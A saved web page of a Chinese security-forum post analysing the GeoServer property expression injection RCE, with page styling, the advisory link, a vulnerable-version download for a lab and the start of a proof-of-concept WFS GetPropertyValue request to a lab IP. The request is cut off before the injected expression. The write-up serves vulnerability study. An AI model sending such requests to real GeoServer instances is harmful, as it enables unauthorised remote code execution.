Penetration_Testing_POC/books/GeoServer_property_expression_injection学习.html


<!DOCTYPE html> <html lang=en><!--
Page saved with SingleFile
url: https://xz.aliyun.com/t/15704
--><meta charset=utf-8>
<title>GeoServer_property_expression_injection学习</title>
<meta name=description content=先知社区,先知安全技术社区>
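<!-- Viewport must not block pinch-zoom (WCAG 1.4.4): maximum-scale / user-scalable=no removed -->
<meta name="viewport" content="width=device-width, initial-scale=1">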
<style>/*!
* Bootstrap v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}footer{display:block}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:hover,a:active{outline:0}img{height:auto;vertical-align:middle;-ms-interpolation-mode:bicubic}input{margin:0}button{-webkit-appearance:button}body{margin:0;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:20px;color:#333}a{text-decoration:none}a:hover,a:focus{color:#005580;text-decoration:underline}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}.container{width:940px}.span10{width:780px}.container{margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;line-height:0;content:""}.container:after{clear:both}p{margin:0 0 10px}strong{font-weight:bold}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h4{margin:10px 0;font-family:inherit;font-weight:bold;line-height:20px;color:inherit;text-rendering:optimizelegibility}h4{font-size:17.5px}ul{padding:0}hr{margin:20px 0;border:0;border-top:1px solid #eee;border-bottom:1px solid #fff}code,pre{color:#333;-webkit-border-radius:3px;-moz-border-radius:3px}code{color:#d14}pre{display:block;margin:0 0 10px;white-space:pre-wrap;border:1px solid rgba(0,0,0,0.15);-webkit-border-radius:4px;-moz-border-radius:4px}input{font-weight:normal}input{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}input[type="text"]{display:inline-block;padding:4px 6px;margin-bottom:10px;font-size:14px;line-height:20px;vertical-align:middle;-webkit-border-radius:4px;-moz-border-radius:4px}input{width:206px}input[type="text"]{background-color:#fff;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border linear .2s,box-shadow linear 
.2s;-moz-transition:border linear .2s,box-shadow linear .2s;-o-transition:border linear .2s,box-shadow linear .2s;transition:border linear .2s,box-shadow linear .2s}textarea:focus,input[type="text"]:focus,input[type="password"]:focus,input[type="datetime"]:focus,input[type="datetime-local"]:focus,input[type="date"]:focus,input[type="month"]:focus,input[type="time"]:focus,input[type="week"]:focus,input[type="number"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="color"]:focus,.uneditable-input:focus{border-color:rgba(82,168,236,0.8);outline:0;outline:thin dotted \9;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6)}input::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:#999}input{margin-left:0}input:focus:invalid,textarea:focus:invalid,select:focus:invalid{color:#b94a48;border-color:#ee5f5b}input:focus:invalid:focus,textarea:focus:invalid:focus,select:focus:invalid:focus{border-color:#e9322d;-webkit-box-shadow:0 0 6px #f8b9b7;-moz-box-shadow:0 0 6px #f8b9b7;box-shadow:0 0 6px #f8b9b7}.fade{opacity:0;-webkit-transition:opacity .15s linear;-moz-transition:opacity .15s linear;-o-transition:opacity .15s linear}.collapse{position:relative;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.btn{text-shadow:0 1px 1px rgba(255,255,255,0.75);vertical-align:middle;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));background-image:-webkit-linear-gradient(top,#fff,#e6e6e6);background-image:-o-linear-gradient(top,#fff,#e6e6e6);background-repeat:repeat-x;border:1px solid 
#ccc;border-bottom-color:#b3b3b3;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05);-moz-box-shadow:in
<style>/*! Editor.md v1.5.0 | editormd.min.css | Open source online markdown editor. | MIT License | By: Pandao | https://github.com/pandao/editor.md | 2015-06-09 *//*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:FontAwesome;src:url(data:font/woff2;base64,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
<style>/*!
* Bootstrap Responsive v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}@-ms-viewport{width:device-width}@media (min-width:768px) and (max-width:979px){}@media (max-width:767px){}@media (min-width:1200px){.row{margin-left:-30px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:30px}.container{width:1170px}.span10{width:970px}input{margin-left:0}}@media (min-width:768px) and (max-width:979px){.row{margin-left:-20px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:20px}.container{width:724px}.span10{width:600px}input{margin-left:0}}@media (max-width:767px){body{padding-right:0px;padding-left:0px}.container{width:auto}.row{margin-left:0}[class*="span"]{display:block;float:none;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.modal{position:fixed;right:20px;left:20px;width:auto;margin:0}.modal.fade{top:-100px}}@media (max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.modal{top:10px;right:10px;left:10px}}@media (max-width:979px){body{padding-top:0}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px}.nav-collapse{clear:both}.nav-collapse.collapse{height:0;overflow:hidden}}@media (min-width:980px){.nav-collapse.collapse{height:auto!important;overflow:visible!important}}</style>
<style>li{line-height:26px}a:hover{text-decoration:none}.post-user-action>span{margin-right:10px;line-height:21px;border:none}.post-user-action .i-seprator{color:rgba(0,0,0,0.1);margin:0 2px}.navbar .brand{padding:0;height:50px;margin-left:0;display:inline-block!important;background-repeat:no-repeat;width:120px;background-size:207px 50px;background-image:url(data:image/svg+xml;base64,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)}.brand-box{position:absolute}.related-section{min-height:42px;padding:5px 0;margin-top:25px;border-top:1px solid #eee}.related-section>.relate
<style>a{color:#778087}.topic-list p{margin:0 0 0 0}.topic-content{min-height:40px}.collapse form{position:relative;width:300px;float:right}div.search{padding:10px 0}.d1 input{height:20px;padding-left:18px;border:1px solid #ddd;border-radius:15px;outline:none;background:#ffffff;color:#9E9C9C;float:right}.vote{font-weight:normal;margin-left:6px}.topic-list{word-break:break-all;word-wrap:break-word}ul{margin:0 0 10px 0}/*!*border-bottom: solid #eee 1px;*!*/.user-info{padding:5px 0 5px 0}.topic-info a,.topic-info{padding-top:5px}.topic-info a:hover{text-decoration:solid}.reminder{min-height:200px;border:1px #ddd solid;border-radius:3px;line-height:200px;text-align:center}</style>
<style>body{background-color:#eee}form{margin:0!important}a:focus{text-decoration:none}.markdown-body p>code{white-space:normal;word-break:break-all;border:none!important}.box ul,ol{margin-bottom:0px!important}.box a:hover{text-decoration:none}.box-container>ul>li{list-style-type:none}#Wrapper .row.box{margin-left:0px}.navbar-inner{border-radius:0px;min-height:40px;padding-right:0px;padding-left:0px;outline:none;margin-bottom:0;list-style:none;z-index:1050;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,0.08);box-shadow:0 1px 4px rgba(0,21,41,0.08);line-height:46px;-webkit-transition:background .3s,width .2s;-o-transition:background .3s,width .2s;transition:background .3s,width .2s}.bs-docs-footer{text-align:left;color:#99979c;height:64px;background-color:#FFF;border-top:1px solid rgba(0,0,0,0.22);line-height:64px}.bs-docs-footer .links>a{display:inline-block;padding:0 12px;border-left:1px solid #e8e8e8;color:#8c8c8c;line-height:1}.bs-docs-footer .links>a:first-child{border-left:none}.box-container .user-info{margin-bottom:10px;background:#fff}.content-title{font-size:24px;color:#333;text-decoration:none;line-height:24px;text-shadow:0 1px 0#fff}.markdown-body h1,.markdown-body h2{border-bottom:none}.box-container{padding:20px}.breadcrumb{padding:8px 10px 8px 15px;margin-bottom:10px;border-radius:0;color:#000;background-color:#fff}.breadcrumb>li{text-shadow:none!important;margin:2px 0px}.active{text-shadow:none!important}.breadcrumb .active{color:#555;display:inline-block;text-shadow:none!important}.label{background-color:#f4f4f4;line-height:12px;display:inline-block;padding:4px 4px 4px 4px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;text-decoration:none;text-shadow:none;font-weight:normal}.topic-info{color:#999!important;font-size:12px!important}.topic-info a{padding:0px;color:#555!important;font-size:12px!important}.topic-info a:hover{color:#4d5256;text-decoration:underline}.topic-info 
.cell{padding-left:0!important;margin-left:0px;font-size:10px;font-weight:bold}.markdown-body img{max-width:90%!important;text-align:center;margin-left:auto;margin-right:auto;display:block;padding:10px 0px 10px 0px}.topic-info span{margin-left:0px;font-size:10px;color:rgba(0,0,0,0.45)}.btn{display:inline-block;padding:4px 12px;margin-bottom:0;font-size:14px;line-height:20px;background-color:#f4f4f4;color:#444;border-color:#ddd;font-family:"Helvetica Neue For Number",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"PingFang SC","Hiragino Sans GB","Microsoft YaHei","Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;list-style:none;font-weight:400;text-align:center;cursor:pointer;background-image:none;white-space:nowrap;border-radius:2px;height:32px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.box{font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:14px;line-height:1.5;color:rgba(0,0,0,0.65);-webkit-box-sizing:border-box;box-sizing:border-box;margin-top:0!important;margin-bottom:20px;padding:0;list-style:none;background:#fff;border-radius:2px;position:relative;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s;-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);-webkit-box-shadow:0 1px 1px rgba(143,168,191,.35);box-shadow:0 1px 1px rgba(143,168,191,.35);border-bottom:1px solid #e2e2e9}.span10{float:left;min-height:1px}#Wrapper .span10{margin-left:0px!important;max-width:960px}@media (min-width:1200px){.container{width:82%!important}}@media screen and (min-width:1500px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px!important}#Wrapper .span10{max-width:810px!important}}@media screen and (min-width:980px) and (max-width:1499px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer 
.container{max-width:1100px!important}#Wrapper .span10{max-width:74%!important}}@media screen and (min-width:768px) and (max-width:979px){#Wrapper.
<style>/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .x{color:#000000}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nf{color:#000000}.highlight .nl{color:#f57900}.highlight .mf{color:#0000cf;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,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" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15704?time__1311=GqjxnQiQDQQ0yRpDyDmObboi%3DqmbbD"><meta 
http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15704&amp;from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>GeoServer_property_expression_injection学习</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/82355>
<span class="username cell"> ooyywwll</span></a> <span class=i-seprator> / </span>
<span> 2024-09-24 20:22:07</span><span class=i-seprator> / </span>
<span>发表于四川 / </span>
<span>浏览数 73</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/4>社区板块</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/1>漏洞分析</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(0)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<h1 id=toc-0><strong>GeoServer_property_expression_injection</strong></h1>
<h2 id=toc-1>简单介绍</h2>
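<!-- target=_blank link to an external origin: rel="noopener noreferrer" severs window.opener and the referrer -->
<p><a href="https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv" target="_blank" rel="noopener noreferrer">https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv</a></p>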
<p>GeoServer 是一款开源的地理数据服务器软件，主要用于发布、共享和处理各种地理空间数据。它支持众多的地图和空间数据标准，能够使各种设备通过网络来浏览和使用这些地理信息数据。<br>
GeoServer 2.23.6、2.24.4 和 2.25.2 之前的版本存在远程代码执行漏洞。该漏洞源于 GeoServer 所使用的第三方库 GeoTools 采用了不安全的 commons-jxpath 引擎来处理 XPath 语句，导致未授权攻击者能够通过发送各类 OGC 请求控制复杂的 XPath 表达式并注入恶意代码，从而实现 RCE。</p>
<h2 id=toc-2>环境搭建</h2>
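<!-- target=_blank link to an external origin: rel="noopener noreferrer" severs window.opener and the referrer -->
<p><a href="https://sourceforge.net/projects/geoserver/files/GeoServer/2.25.1/geoserver-2.25.1-bin.zip/download" target="_blank" rel="noopener noreferrer">https://sourceforge.net/projects/geoserver/files/GeoServer/2.25.1/geoserver-2.25.1-bin.zip/download</a></p>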
<p>也可以直接使用 p 神的环境进行远程调试。</p>
<h2 id=toc-3>漏洞复现</h2>
<p>发送如下 POST 请求：</p>
<div class=highlight><pre><span></span><span class=n>POST</span> <span class=o>/</span><span class=n>geoserver</span><span class=o>/</span><span class=n>wfs</span> <span class=n>HTTP</span><span class=o>/</span><span class=mf>1.1</span>
<span class=nl>Host:</span> <span class=mf>192.168.177.146</span><span class=o>:</span><span class=mi>8080</span>
<span class=n>Accept</span><span class=o>-</span><span class=n>Encoding</span><span class=o>:</span> <span class=n>gzip</span><span class=o>,</span> <span class=n>deflate</span><span class=o>,</span> <span class=n>br</span>
<span class=nl>Accept:</span> <span class=o>*/*</span>
<span class=n>Accept</span><span class=o>-</span><span class=n>Language</span><span class=o>:</span> <span class=n>en</span><span class=o>-</span><span class=n>US</span><span class=o>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.9</span><span class=o>,</span><span class=n>en</span><span class=o>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.8</span>
<span class=n>User</span><span class=o>-</span><span class=n>Agent</span><span class=o>:</span> <span class=n>Mozilla</span><span class=o>/</span><span class=mf>5.0</span> <span class=o>(</span><span class=n>Windows</span> <span class=n>NT</span> <span class=mf>10.0</span><span class=o>;</span> <span class=n>Win64</span><span class=o>;</span> <span class=n>x64</span><span class=o>)</span> <span class=n>AppleWebKit</span><span class=o>/</span><span class=mf>537.36</span> <span class=o>(</span><span class=n>KHTML</span><span class=o>,</span> <span class=n>like</span> <span class=n>Gecko</span><span class=o>)</span> <span class=n>Chrome</span><span class=o>/</span><span class=mf>124.0.6367.118</span> <span class=n>Safari</span><span class=o>/</span><span class=mf>537.36</span>
<span class=nl>Connection:</span> <span class=n>close</span>
<span class=n>Cache</span><span class=o>-</span><span class=n>Control</span><span class=o>:</span> <span class=n>max</span><span class=o>-</span><span class=n>age</span><span class=o>=</span><span class=mi>0</span>
<span class=n>Content</span><span class=o>-</span><span class=n>Type</span><span class=o>:</span> <span class=n>application</span><span class=o>/</span><span class=n>xml</span>
<span class=n>Content</span><span class=o>-</span><span class=n>Length</span><span class=o>:</span> <span class=mi>355</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span> <span class=n>service</span><span class=o>=</span><span class=err>'</span><span class=n>WFS</span><span class=err>'</span> <span class=n>version</span><span class=o>=</span><span class=err>'</span><span class=mf>2.0.0</span><span class=err>'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>topp</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.openplans.org/topp'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>fes</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/fes/2.0'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>wfs</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/wfs/2.0'&gt;</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>Query</span> <span class=n>typeNames</span><span class=o>=</span><span class=err>'</span><span class=n>sf</span><span class=o>:</span><span class=n>archsites</span><span class=err>'</span><span class=o>/&gt;</span>
